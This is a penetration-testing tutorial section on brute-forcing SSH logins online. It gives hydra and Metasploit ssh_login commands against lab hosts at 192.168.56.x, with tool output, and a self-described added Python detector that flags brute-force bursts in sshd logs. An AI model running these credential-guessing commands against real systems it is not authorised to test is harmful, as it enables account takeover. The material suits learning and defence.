9.4 : Pre exploitation - Pre password cracking

Crack the password over the internet

Sometimes, if the target does not expose any password hashes or exploitable vulnerabilities,

we can fall back to an online brute-force attack and guess the password directly.

It is a last resort, since it generates a large amount of traffic and noise.

Tools

  • Password dictionary

    ◦ In Kali, use "wordlist" as a keyword to find the bundled lists (locate wordlist).

    ◦ You can also download one from the internet, or build one yourself.

  • Password cracker

    ◦ Burp

    ◦ Metasploit

    ◦ hydra

    ◦ Many other tools can do this.

Example - cracking SSH

Locate the wordlists, pick one, or build one. It's up to you.

root@kali:~# locate wordlist | head -n 20
/usr/bin/wordlists
/usr/sbin/remove-default-wordlist
/usr/sbin/select-default-wordlist
/usr/sbin/update-default-wordlist
/usr/share/wordlists
/usr/share/applications/kali-wordlists.desktop
/usr/share/dict/README.select-wordlist
/usr/share/dict/wordlist-top4800-probable.txt
/usr/share/dirb/wordlists
/usr/share/dirb/wordlists/big.txt
/usr/share/dirb/wordlists/catala.txt
/usr/share/dirb/wordlists/common.txt
/usr/share/dirb/wordlists/euskera.txt
/usr/share/dirb/wordlists/extensions_common.txt
/usr/share/dirb/wordlists/indexes.txt
/usr/share/dirb/wordlists/mutations_common.txt
/usr/share/dirb/wordlists/others
/usr/share/dirb/wordlists/small.txt
/usr/share/dirb/wordlists/spanish.txt
/usr/share/dirb/wordlists/stress
...

Hydra

root@kali:~# hydra -h
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -O        use old SSL v2 and v3
  -q        do not print messages about connection errors
  -U        service module usage details
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql
nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

Start cracking it

root@kali:~# locate wordlist | grep password | head -n 20
/usr/share/metasploit-framework/data/wordlists/hci_oracle_passwords.csv
/usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt
/usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv
/usr/share/metasploit-framework/data/wordlists/password.lst
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt
root@kali:~# wc -l /usr/share/metasploit-framework/data/wordlists/password.lst
88397 /usr/share/metasploit-framework/data/wordlists/password.lst
root@kali:~# hydra -v -l root -P /usr/share/metasploit-framework/data/wordlists/password.lst -t 1 192.168.56.103 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-04 23:54:14
[DATA] max 1 task per 1 server, overall 1 task, 88397 login tries (l:1/p:88397), ~88397 tries per task
[DATA] attacking ssh://192.168.56.103:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@192.168.56.103:22
[INFO] Successful, password authentication is supported by ssh://192.168.56.103:22

Now just wait; with 88397 candidates and one task, it takes time.

Hydra prints any found login/password pair when it finishes (or as soon as it hits, with -f).
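The run above queues 88397 login attempts against a single host, and every one of them is written to the target's sshd auth log; that is the "noise" mentioned at the start of this section, and it is exactly what a defender watches for. The following is an added example, not code from this page or from the hydra project: a small Python detector that parses constructed sshd auth-log lines (syslog format; the year 2019, the host name `target`, the source addresses and the 5-failures-in-60-seconds threshold are all assumptions) and flags a source that crosses the failure threshold, as well as any accepted login from a source that had already failed that many times.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime

# Constructed sample of the sshd lines an online guessing run leaves in the
# target's auth log (syslog format). Not real captured data.
SAMPLE_AUTH_LOG = """\
Nov  4 23:54:15 target sshd[2101]: Failed password for root from 192.168.56.1 port 40211 ssh2
Nov  4 23:54:16 target sshd[2103]: Failed password for root from 192.168.56.1 port 40212 ssh2
Nov  4 23:54:17 target sshd[2105]: Failed password for root from 192.168.56.1 port 40213 ssh2
Nov  4 23:54:18 target sshd[2107]: Failed password for invalid user admin from 192.168.56.1 port 40214 ssh2
Nov  4 23:54:19 target sshd[2109]: Failed password for root from 192.168.56.1 port 40215 ssh2
Nov  4 23:54:20 target sshd[2111]: Failed password for root from 192.168.56.1 port 40216 ssh2
Nov  4 23:55:02 target sshd[2140]: Accepted password for root from 192.168.56.1 port 40300 ssh2
Nov  4 23:58:40 target sshd[2201]: Failed password for alice from 10.0.0.7 port 51000 ssh2
Nov  4 23:59:01 target sshd[2203]: Accepted publickey for alice from 10.0.0.7 port 51001 ssh2
"""

# Matches the OpenSSH "Failed/Accepted <method> for [invalid user] <user> from <ip> port <n>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port (?P<port>\d+)"
)


def parse_auth_line(line, year=2019):
    """Parse one sshd auth line into a dict, or return None for non-login lines.
    Syslog timestamps carry no year, so one is assumed (2019 here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "src": m["src"], "port": int(m["port"])}


def detect_bruteforce(log_text, window_seconds=60, threshold=5, year=2019):
    """Flag any source with >= threshold failed logins inside a sliding window,
    and any accepted login from a source that already had that many failures."""
    events = [e for e in (parse_auth_line(l, year) for l in log_text.splitlines()) if e]
    events.sort(key=lambda e: e["ts"])
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    failures_total = Counter()    # src -> every failure seen so far
    alerted = set()               # sources already reported, to avoid one alert per line
    alerts = []
    for e in events:
        src = e["src"]
        if e["result"] == "Failed":
            failures_total[src] += 1
            window = recent[src]
            window.append(e["ts"])
            while (e["ts"] - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= threshold and src not in alerted:
                alerted.add(src)
                alerts.append({"type": "bruteforce", "src": src,
                               "failures": len(window), "window_s": window_seconds,
                               "first": window[0], "last": e["ts"]})
        elif failures_total[src] >= threshold:
            # A success after a burst of failures is the signal that a guess worked.
            alerts.append({"type": "success_after_failures", "src": src,
                           "user": e["user"], "method": e["method"],
                           "failures_before": failures_total[src], "at": e["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

With `-t 1` and no delay, the hydra run above produces far more than five failures a minute, so even this simple window catches it; the second alert type is the one worth paging on, because it means a guessed credential was accepted. A real deployment would read `/var/log/auth.log` or the journal instead of the embedded sample.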


Metasploit

> msfconsole
> search ssh

msf5 > search ssh

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/dos/windows/ssh/sysax_sshd_kexchange              2013-03-17       normal     No     Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
   1   auxiliary/fuzzers/ssh/ssh_kexinit_corrupt                                    normal     No     SSH Key Exchange Init Corruption
   2   auxiliary/fuzzers/ssh/ssh_version_15                                         normal     No     SSH 1.5 Version Fuzzer
   3   auxiliary/fuzzers/ssh/ssh_version_2                                          normal     No     SSH 2.0 Version Fuzzer
   4   auxiliary/fuzzers/ssh/ssh_version_corrupt                                    normal     No     SSH Version Corruption
   5   auxiliary/scanner/http/cisco_firepower_login                                 normal     Yes    Cisco Firepower Management Console 6.0 Login
   6   auxiliary/scanner/http/gitlab_user_enum                     2014-11-21       normal     Yes    GitLab User Enumeration
   7   auxiliary/scanner/ssh/apache_karaf_command_execution        2016-02-09       normal     Yes    Apache Karaf Default Credentials Command Execution
   8   auxiliary/scanner/ssh/cerberus_sftp_enumusers               2014-05-27       normal     Yes    Cerberus FTP Server SFTP Username Enumeration
   9   auxiliary/scanner/ssh/detect_kippo                                           normal     Yes    Kippo SSH Honeypot Detector
   10  auxiliary/scanner/ssh/eaton_xpert_backdoor                  2018-07-18       normal     Yes    Eaton Xpert Meter SSH Private Key Exposure Scanner
   11  auxiliary/scanner/ssh/fortinet_backdoor                     2016-01-09       normal     Yes    Fortinet SSH Backdoor Scanner
   12  auxiliary/scanner/ssh/juniper_backdoor                      2015-12-20       normal     Yes    Juniper SSH Backdoor Scanner
   13  auxiliary/scanner/ssh/karaf_login                                            normal     Yes    Apache Karaf Login Utility
   14  auxiliary/scanner/ssh/libssh_auth_bypass                    2018-10-16       normal     Yes    libssh Authentication Bypass Scanner
   15  auxiliary/scanner/ssh/ssh_enumusers                                          normal     Yes    SSH Username Enumeration
   16  auxiliary/scanner/ssh/ssh_identify_pubkeys                                   normal     Yes    SSH Public Key Acceptance Scanner
   17  auxiliary/scanner/ssh/ssh_login                                              normal     Yes    SSH Login Check Scanner
   18  auxiliary/scanner/ssh/ssh_login_pubkey                                       normal     Yes    SSH Public Key Login Scanner
   19  auxiliary/scanner/ssh/ssh_version                                            normal     Yes    SSH Version Scanner
....

> use auxiliary/scanner/ssh/ssh_login
msf5 auxiliary(scanner/ssh/ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           false            yes       Whether to print output for all attempts

msf5 auxiliary(scanner/ssh/ssh_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/password.lst
pass_file => /usr/share/metasploit-framework/data/wordlists/password.lst
msf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.56.101
rhosts => 192.168.56.101
msf5 auxiliary(scanner/ssh/ssh_login) > set username root
username => root
msf5 auxiliary(scanner/ssh/ssh_login) > exploit

Just like that.

That is all there is to the scan.

Another tip for pwn:
DON'T WASTE YOUR TIME WHILE BRUTE FORCING.

While it runs, try other things: do more recon, look for vulnerable endpoints.

Keep trying.